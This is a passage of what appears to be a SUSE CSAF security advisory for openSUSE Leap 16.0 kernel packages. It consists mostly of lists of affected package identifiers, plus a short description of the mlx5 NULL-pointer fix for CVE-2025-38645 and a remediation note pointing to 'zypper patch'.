"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38590"
},
{
"cve": "CVE-2025-38645",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38645"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Check device memory pointer before usage\n\nAdd a NULL check before accessing device memory to prevent a crash if\ndev-\u003edm allocation in mlx5_init_once() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38645",
"url": "https://www.suse.com/security/cve/CVE-2025-38645"
},
{
"category": "external",
"summary": "SUSE Bug 1248626 for CVE-2025-38645",
"url": "https://bugzilla.suse.com/1248626"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
